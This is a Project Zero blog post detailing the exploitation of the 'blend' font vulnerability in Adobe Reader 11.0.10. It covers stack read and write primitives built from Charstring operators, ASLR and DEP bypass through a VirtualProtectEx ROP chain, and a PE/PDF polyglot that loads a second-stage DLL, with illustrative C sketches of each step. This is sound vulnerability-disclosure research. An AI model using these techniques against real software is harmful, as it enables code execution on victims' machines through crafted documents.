Thursday, August 6, 2015

One font vulnerability to rule them all #2: Adobe Reader RCE exploitation

Posted by Mateusz Jurczyk of Google Project Zero

This is part #2 of the “One font vulnerability to rule them all” blog post series. In part #1 (“introducing the BLEND vulnerability”), we discussed how developments in the digital typography field in the last four decades shaped the various font formats in use today, described the two most commonly used PostScript formats (Type 1 and OpenType), outlined the structure of the ATMFD.DLL font program interpreter (shared between many other products) and finally introduced the “blend” operator vulnerability.

Today, we will focus on developing a reliable exploit for Adobe Reader using the security flaw, demonstrating how it could be successfully used to achieve arbitrary code execution within the renderer process, and creating foundations for a full system compromise. Let’s get to work!

Exploitation of Adobe Reader

The overall goal I set for myself when starting to work on the proof of concept was to prepare a PDF file which would pop up calc.exe upon opening in Adobe Reader 11.0.10 (latest affected version) on Windows 8.1 Update 1, both 32-bit and 64-bit. It was supposed to be fully reliable against the specific software build, elevate the Calculator process to high integrity level and/or the NT AUTHORITY\SYSTEM security context, and work with all possible exploit mitigations enabled in user and kernel mode. This required a single exploit targeting Adobe Reader and two distinct second-stage exploits for 32-bit and 64-bit Windows kernels.

While in principle the vulnerability may look easy to exploit due to the powerful primitives it provides, the devil is in the details, and several of them need to be worked out to construct the PDF exploit described above. First of all, while we can indeed set the “op_sp” pointer well outside the local “op_stk” array and continue Charstring execution, not all operators will work then. Specifically, all operators moving the stack pointer forward (i.e. pushing more data than they pop) do check that the pointer does not go out of bounds. This makes our life considerably harder, as we lose access to a number of very useful data writing instructions, the most basic one being the regular numeric instruction, but also “dup”, “pop”, “callgsubr”, “random” and others. An example of the bounds check executed by the “random” instruction is shown below:

case RANDOM:
  if (op_sp >= &op_stk_end) {
    AtmfdDbgPrint("windows\\core\\ntgdi\\fondrv\\otfd\\bc\\t1interp.c",
                  6015, "stack overflow - otherRANDOM", "false");
    goto label_error;
  }

However, among the multitude of supported operators, there are also some which do write to the stack but do not increase the stack pointer, because they pop at least as much data as they push. Such operators omit the checks, which is a valid optimization: if each increase of “op_sp” is (in theory) properly sanitized, the non-increasing instructions can safely assume at any point in time that the pointer is valid. Interestingly, the lack of this safety net makes the vulnerability exploitable.
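The asymmetry between the two kinds of operators can be modeled with a toy interpreter. The following is only a minimal sketch and not the actual ATMFD.DLL code: the Interp structure, the array sizes, the corrupt_sp helper and the value pushed by op_random are all hypothetical, and the stack pointer is modeled as an index into a larger array so that the simulation itself stays memory safe.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical sizes: the first OP_STK_LEN cells model op_stk, the rest
 * model whatever lies above it on the thread's stack. */
enum { OP_STK_LEN = 48, FRAME_LEN = 64 };

typedef struct {
    int32_t frame[FRAME_LEN];
    int     sp;               /* index of the next free slot, models op_sp */
} Interp;

/* Growing operator: it pushes one value, so it validates op_sp first.
 * Returns 0 on success and -1 on the "stack overflow" error path. */
static int op_random(Interp *it) {
    if (it->sp >= OP_STK_LEN) {
        return -1;
    }
    it->frame[it->sp++] = 0x1234;   /* stand-in for a random value */
    return 0;
}

/* Non-growing operator: pops one value and pushes one, so op_sp does not
 * move and no interpreter-level bounds check is performed. */
static int op_neg(Interp *it) {
    /* This assert only protects the simulation, not the modeled interpreter. */
    assert(it->sp >= 1 && it->sp <= FRAME_LEN);
    uint32_t v = (uint32_t)it->frame[it->sp - 1];
    it->frame[it->sp - 1] = (int32_t)(0u - v);
    return 0;
}

/* Stand-in for the effect of the "blend" bug: op_sp ends up out of bounds. */
static void corrupt_sp(Interp *it, int new_sp) {
    assert(new_sp >= 1 && new_sp <= FRAME_LEN);
    it->sp = new_sp;
}
```

With the pointer moved past the end of the modeled op_stk, op_random fails with an error, while op_neg happily modifies the cell outside the array.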

After inspecting all implemented commands, it turns out that the following stack-writing instructions can still be used with an out-of-bounds “op_sp”:

NOT (Bitwise negation)

NEG (Negation)

ABS (Absolute value)

SQRT (Square root)

INDEX (Get indexed value from stack)

EXCH (Exchange topmost values on stack)

DIV (Division)

ADD (Addition)

SUB (Subtraction)

MUL (Multiplication)

GET (Get value from transient array)

Unfortunately, none of those instructions can be trivially used to write controlled data under the stack pointer. The arithmetic and logic instructions require somewhat controlled operands, but we obviously do not control the memory we want to overwrite (that’s the whole point). Similarly, we cannot use the “index” instruction, as it replaces the top stack item with one x items below the top – and again, we don’t control the x.

The only instruction we are left with is “get”, which replaces a 16-bit index residing under “op_sp” with the corresponding value in the transient array. Since the index value is of limited width, my original idea was to specify a 65535-entry transient array (via the /lenBuildCharArray field) and insert the desired value into all cells, effectively guaranteeing that regardless of the original value (interpreted as index), the instruction would always write the desired number to the stack. While generally valid, the approach has some significant downsides. First, it would incur a huge overhead of roughly 65 thousand instructions stored in the file and executed for a single value insertion. Second, the index number is interpreted as a signed integer, with negative numbers being automatically rejected by the “get” implementation (this could probably be addressed with the “abs” instruction, though).

The general problem here is that we have no idea about the original value on the stack being overwritten. However, if we look again at the above list of allowed operators, we can spot one that significantly reduces the topmost value upon each execution: the “sqrt” instruction! The command treats the 32-bit operand as a 16.16 Fixed value, and replaces it with an approximation of its square root. What’s also important is that the 16-bit integer part of the value overlaps with the 16-bit index used by the “get” instruction. Thanks to all of the above, if we execute the “sqrt” instruction five times in a row, we can be sure that the 16-bit number under “op_sp” will be one of two values:

0 – if the value was originally zero.

1 – otherwise.

As a result, we have reduced the spectrum of all possible “get” parameters from 65536 to just 2, using only five instructions. Overall, this makes it possible to insert an arbitrary value anywhere on the thread’s stack by first putting it into the transient array under indexes 0 and 1 (with the “put” command), then moving “op_sp” to the desired location using the vulnerable “blend” operator and invoking five “sqrt” instructions followed by a “get”.
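The reduction can be checked with a small simulation. This is a sketch under stated assumptions rather than the interpreter's real arithmetic: the cell is treated as an unsigned 16.16 value, “sqrt” is modeled with an exact integer square root instead of the interpreter's approximation, and the names fixed_sqrt, squash, write_primitive and TRANSIENT_LEN are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

enum { TRANSIENT_LEN = 32 };   /* hypothetical transient array length */

/* Floor of the square root of a 64-bit integer (digit-by-digit method). */
static uint64_t isqrt64(uint64_t n) {
    uint64_t res = 0;
    uint64_t bit = (uint64_t)1 << 62;
    while (bit > n) {
        bit >>= 2;
    }
    while (bit != 0) {
        if (n >= res + bit) {
            n -= res + bit;
            res = (res >> 1) + bit;
        } else {
            res >>= 1;
        }
        bit >>= 2;
    }
    return res;
}

/* Models "sqrt" on a 16.16 value: sqrt(x / 2^16) * 2^16 == sqrt(x * 2^16). */
static uint32_t fixed_sqrt(uint32_t x) {
    return (uint32_t)isqrt64((uint64_t)x << 16);
}

/* Five consecutive "sqrt" operations on an unknown stack cell. */
static uint32_t squash(uint32_t cell) {
    for (int i = 0; i < 5; i++) {
        cell = fixed_sqrt(cell);
    }
    return cell;
}

/* put value at indexes 0 and 1, squash the unknown cell, then "get".
 * Returns the value that ends up in the overwritten stack cell. */
static uint32_t write_primitive(uint32_t unknown_cell, uint32_t value) {
    uint32_t transient[TRANSIENT_LEN] = {0};
    transient[0] = value;
    transient[1] = value;
    uint32_t index = squash(unknown_cell) >> 16;   /* integer part */
    assert(index <= 1);
    return transient[index];
}
```

Whatever the cell held before, write_primitive returns the chosen value, which mirrors the way five “sqrt”s followed by a “get” overwrite an unknown stack location.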

The animation below illustrates the full process of writing the number 31337 to a stack location 400 bytes from the beginning of the “op_stk” array:

While writing data to the stack is an important capability, it is equally important to be able to read data as well. This is primarily needed to defeat ASLR, which forces us to leak the base address(es) of module(s) in the virtual address space and use them to calculate the locations of ROP gadgets (for the purpose of bypassing DEP). The goal can be accomplished in a similar way, by using the “put” instruction which is a counterpart of “get”, loading data from the stack to the transient array. If we precede the “put” operator with five “sqrt”s, then the second topmost stack value will be inserted into the transient array at index 0 or 1. In order to deterministically read the value back and operate on it, we first have to pre-initialize both entries with zeros, and after the operation takes place add the values together in order to get the final result.
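The read side and the follow-up address arithmetic can be sketched as below. The code is illustrative only: the squashed index (0 or 1) is passed in directly instead of being computed with “sqrt”, and every name as well as every pointer or offset value used with these helpers is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

enum { TRANSIENT_LEN = 32 };   /* hypothetical transient array length */

/* Models five "sqrt"s followed by "put": the second topmost stack value
 * lands at transient index 0 or 1, and the other entry stays zero, so the
 * sum of both entries is the leaked value in either case. */
static uint32_t leak_via_put(uint32_t second_topmost, unsigned squashed_index) {
    uint32_t transient[TRANSIENT_LEN] = {0};
    assert(squashed_index <= 1);
    transient[0] = 0;                              /* pre-initialize */
    transient[1] = 0;
    transient[squashed_index] = second_topmost;    /* the "put" itself */
    return transient[0] + transient[1];
}

/* A leaked code pointer minus its known offset inside the module gives
 * the module's load address. */
static uint32_t image_base_from_leak(uint32_t leaked_ptr, uint32_t known_rva) {
    assert(leaked_ptr >= known_rva);
    return leaked_ptr - known_rva;
}

/* Gadget locations are then fixed offsets from that base. */
static uint32_t gadget_address(uint32_t image_base, uint32_t gadget_rva) {
    return image_base + gadget_rva;
}
```

For example, a made-up leaked pointer of 0x6A3C1234 that is known to sit at offset 0x41234 in its module yields a base of 0x6A380000, aligned to 64 KB as Windows image bases are.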

After the read or write operation is performed somewhere up the stack, it would also be useful to reset “op_sp” back to &op_stk[0], in order to process the newly acquired data or set up the execution context for writing another chunk, without having to worry about the “illegal” commands or destroying parts of the already crafted ROP chain. This is possible with the “setcurrentpoint” instruction, which does exactly that (resets the operand stack pointer back to the beginning of the local stack array) without any side effects.

An example of reading a function pointer from the stack and using it to calculate the base address of an executable image with the above techniques is shown in the animation below:

With the ability to perform arbitrary reads and writes anywhere on the stack using the Charstring program, we now have all the primitives needed to reliably create a ROP chain and achieve arbitrary code execution in the sandboxed process. In keeping with the KISS principle, it would be easiest and most elegant to just perform a single call to the LoadLibrary function, with the path of the exploit PDF file specified in the argument. This should be theoretically possible via a PE + PDF polyglot file, thanks to the fact that the “%PDF” magic bytes don’t have to be present at the very beginning of the file, which would enable us to have both the Adobe Reader exploit and a second-stage DLL written in C/C++ contained within the same file. The feasibility of a PE/PDF polyglot has already been shown by Ange Albertini in his CorkaMIX proof of concept in 2012 [1]. Unfortunately, there are some problems with this idea:

In order to pass a string with the input PDF file path to LoadLibrary, the string or a (potentially relative) pointer to it would have to be present somewhere on the exploited thread’s stack, which - according to our experiments - was unfortunately not the case.

Even if the above was not an issue, Adobe Reader recently began rejecting PDF files starting with the executable “MZ” signature. The reason for this change in behavior is not clear to us, but it would effectively prevent our polyglot from being opened as a document, entirely blocking the attack.

Consequently, we have to settle on a slightly less elegant (yet equally reliable) solution – a standard ROP chain enabling arbitrary code execution by marking the attacker-controlled portions of memory as executable with a VirtualProtect API call, and then jumping to the code. In the case of Adobe Reader, this required us to first resolve the address of the “VirtualProtectEx” function using CoolType’s internal implementation of the GetProcAddress routine (first gadget), then call the function with a PAGE_EXECUTE_READWRITE parameter and a pointer to the location on the stack where the first-stage payload was set up (second gadget), followed by a return to the now executable shellcode. The final structure of the ROP chain used in the proof of concept exploit is shown in Figure 1.
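To make the idea more concrete, here is a generic sketch of the stack words consumed by a 32-bit stdcall call to VirtualProtect that returns straight into the payload. It is not the chain from Figure 1: it takes the function address as given instead of resolving it through CoolType, it uses the four-argument VirtualProtect (VirtualProtectEx takes an additional leading process handle), and the function, parameter and constant names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Value of the Win32 PAGE_EXECUTE_READWRITE protection constant. */
#define PROT_PAGE_EXECUTE_READWRITE 0x40u

enum { PROTECT_FRAME_WORDS = 6 };

/* Fills "out" with the words that a preceding "ret" would consume in
 * order to call VirtualProtect(payload, size, RWX, scratch) and then
 * return directly into the payload. Returns the number of words written. */
static size_t build_protect_frame(uint32_t *out, size_t capacity,
                                  uint32_t virtual_protect_addr,
                                  uint32_t payload_addr,
                                  uint32_t payload_size,
                                  uint32_t scratch_addr) {
    assert(out != NULL && capacity >= PROTECT_FRAME_WORDS);
    size_t i = 0;
    out[i++] = virtual_protect_addr;          /* popped by "ret": callee   */
    out[i++] = payload_addr;                  /* callee's return address   */
    out[i++] = payload_addr;                  /* lpAddress                 */
    out[i++] = payload_size;                  /* dwSize                    */
    out[i++] = PROT_PAGE_EXECUTE_READWRITE;   /* flNewProtect              */
    out[i++] = scratch_addr;                  /* lpflOldProtect (writable) */
    return i;
}
```

In the Charstring exploit, each of these words would be planted one at a time with the “sqrt” and “get” write primitive described earlier.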

Even though we have now ended up at the assembly level, it would still be significantly more convenient to proceed with the attack using C/C++ code – while developing a second-stage font-related win32k.sys exploit in assembly is definitely possible, it’s also no fun at all. It would be best if we could get a controlled DLL loaded via a LoadLibrary call after all, even if it’s a “deferred” call made by the first stage payload and not directly from the ROP chain. There are two things that play to our advantage here: first of all, the renderer process has an active HANDLE (with read access) to the exploit PDF file at the time of exploitation. Secondly, while filesystem access is largely limited, especially in terms of write capabilities, the renderer still does have write access to a temporary directory at “%APPDATA%\Adobe\Acrobat\11.0”.

In order to take advantage of these conditions, we can create the aforementioned PE/PDF polyglot with a 2nd stage DLL by compiling it in Visual Studio with the /STUB linker option pointing to the PDF file with a valid DOS header prepended. This will result in having the PDF file embedded in the PE file, sufficiently close to the beginning to be correctly opened by Adobe Reader. Due to the program’s behavior, we have to replace the “MZ” signature with some other bytes, such as “mz”. With the above file prepared, we can then perform the following actions in the assembly payload in order to call the DllMain function of the DLL module:

When a path ending with “.pdf” is encountered, we have located the exploit file. Copy it to the temporary directory at %APPDATA%\Adobe\Acrobat\11.0.

Restore the original “MZ” signature to make it a valid PE file again.

Invoke LoadLibrary over the new file, having our C++ DllMain function called.
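The copy and signature-restoring steps above can be sketched in portable C. Note that the actual first-stage payload was written in assembly and ran inside the sandboxed renderer, so this is only an illustration of the byte-level transformation; the function name and the use of stdio instead of Win32 file APIs are our assumptions, and the final LoadLibrary call is left out.

```c
#include <assert.h>
#include <stdio.h>

/* Copies the polyglot at src_path to dst_path and overwrites the first
 * two bytes of the copy with "MZ", turning it back into a valid PE file.
 * Returns 0 on success and -1 on any I/O failure. */
static int copy_and_restore_mz(const char *src_path, const char *dst_path) {
    assert(src_path != NULL && dst_path != NULL);

    FILE *in = fopen(src_path, "rb");
    if (in == NULL) {
        return -1;
    }
    FILE *out = fopen(dst_path, "wb");
    if (out == NULL) {
        fclose(in);
        return -1;
    }

    char buf[4096];
    size_t n;
    int ok = 1;
    while ((n = fread(buf, 1, sizeof buf, in)) > 0) {
        if (fwrite(buf, 1, n, out) != n) {
            ok = 0;
            break;
        }
    }
    if (ferror(in)) {
        ok = 0;
    }
    /* Restore the executable signature at offset 0 of the copy. */
    if (ok && (fseek(out, 0, SEEK_SET) != 0 || fwrite("MZ", 1, 2, out) != 2)) {
        ok = 0;
    }
    fclose(in);
    if (fclose(out) != 0) {
        ok = 0;
    }
    /* A real payload would now pass dst_path to LoadLibrary. */
    return ok ? 0 : -1;
}
```

The original file is left untouched, which matters here because the renderer only holds a read handle to it.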

As a result, we now have the ability to carry out the remainder of the attack using a high level programming language. An example of displaying a message box dialog in the DllMain function is shown in Figure 3.

Figure 3. Working arbitrary C++ code in the DllMain function of the 2nd stage DLL.

At this point, we have a PDF file reliably executing arbitrary C++ code in the context of any Adobe Reader 11.0.10 installation. We can now proceed to developing a kernel attack in order to escape the sandbox – in this case, however, we do have to differentiate between x86 and x64 platforms, as different exploits will have to be used. The necessary information regarding system bitness can be obtained with an IsWow64Process API call.

In the next post, we will discuss how the vulnerable code paths in ATMFD.DLL could be reached from the context of a restricted Adobe Reader process, in order to repeat the exploitation of the BLEND vulnerability and elevate our privileges in the operating system.